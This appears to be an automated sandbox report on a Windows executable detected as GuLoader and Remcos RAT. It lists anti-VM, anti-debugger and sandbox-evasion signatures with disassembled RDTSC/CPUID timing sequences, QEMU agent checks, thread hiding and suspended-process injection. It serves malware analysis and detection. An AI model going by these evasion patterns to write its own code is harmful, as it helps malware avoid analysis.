Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2FD3		1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B		1_2_020F2D3B

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:

Tries to detect Any.run

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7CB5 second address: 00000000020F7CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B0E65173h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B0E65169h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B0E6506Ch 0x00000063 call 00007FB8B0E650C7h 0x00000068 call 00007FB8B0E65194h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7DF9 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0366842h 0x0000002e popad 0x0000002f call 00007FB8B03663C1h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000567CB5 second address: 0000000000567CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B03662D3h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B03662C9h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B03661CCh 0x00000063 call 00007FB8B0366227h 0x00000068 call 00007FB8B03662F4h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000567DF9 second address: 0000000000567DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0E656E2h 0x0000002e popad 0x0000002f call 00007FB8B0E65261h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056326F second address: 00000000005632FA instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [edi+00000814h], esi 0x00000009 mov esi, dword ptr [ebp+00000277h] 0x0000000f je 00007FB8B03663A8h 0x00000015 mov dword ptr [ebp+000001C9h], eax 0x0000001b mov eax, ecx 0x0000001d push eax 0x0000001e mov eax, dword ptr [ebp+000001C9h] 0x00000024 mov esi, dword ptr [edi+00000814h] 0x0000002a mov eax, dword ptr [edi+00000800h] 0x00000030 add eax, esi 0x00000032 add eax, ecx 0x00000034 test dh, dh 0x00000036 mov dword ptr [ebp+000001A6h], eax 0x0000003c mov eax, EC4E9022h 0x00000041 xor eax, 74E0F7A3h 0x00000046 xor eax, 4B60BED9h 0x0000004b sub eax, D3CED944h 0x00000050 cmp bh, 00000033h 0x00000053 push eax 0x00000054 mov eax, dword ptr [ebp+000001A6h] 0x0000005a mov dword ptr [ebp+0000018Fh], edx 0x00000060 mov edx, eax 0x00000062 push edx 0x00000063 mov edx, dword ptr [ebp+0000018Fh] 0x00000069 cmp ah, ch 0x0000006b mov ebx, edi 0x0000006d add ebx, 00000C00h 0x00000073 mov dword ptr [ebp+00000273h], ecx 0x00000079 mov ecx, ebx 0x0000007b cmp dl, al 0x0000007d push ecx 0x0000007e mov ecx, dword ptr [ebp+00000273h] 0x00000084 cmp dh, FFFFFFD7h 0x00000087 pushad 0x00000088 lfence 0x0000008b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F5781 rdtsc

1_2_020F5781

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Window / User API: threadDelayed 9165			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Window / User API: foregroundWindowGot 557			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080	Thread sleep count: 9165 > 30			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080	Thread sleep time: -45825s >= -30000s			Jump to behavior

Sleep loop found (likely to delay execution)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Thread sleep count: Count: 9165 delay: -5

Jump to behavior

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWu
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH0

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F5781 rdtsc

1_2_020F5781

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F6568 LdrInitializeThunk,

1_2_020F6568

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F853B mov eax, dword ptr fs:[00000030h]	1_2_020F853B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F73B4 mov eax, dword ptr fs:[00000030h]	1_2_020F73B4
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3441 mov eax, dword ptr fs:[00000030h]	1_2_020F3441
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5589 mov eax, dword ptr fs:[00000030h]	1_2_020F5589
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3874 mov eax, dword ptr fs:[00000030h]	1_2_020F3874
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7898 mov eax, dword ptr fs:[00000030h]	1_2_020F7898
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B mov eax, dword ptr fs:[00000030h]	1_2_020F2D3B

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'

Jump to behavior

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program Managerc
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program Manager
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp, logs.dat.11.dr	Binary or memory string: [ Program Manager ]
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\z
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\q
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp	Binary or memory string: \|Program Manager\|
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\,

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Remote Access Functionality:

Yara detected Remcos RAT

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

ID:	457930
Product:	CloudBasic
Start time:	15:15:06
Start date:	02.08.2021
Sample:	kGSHiWbgq9.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	27bf14807bc9d5cd2d823293f43c3a3a
SHA1:	08eeed11867aa351be0d6c48da283721ee6c0769
SHA256:	55fd5769df0df23d4140a34d07dc2c833b43ac1060f4d0992bdd27316041c69a
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report kGSHiWbgq9.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs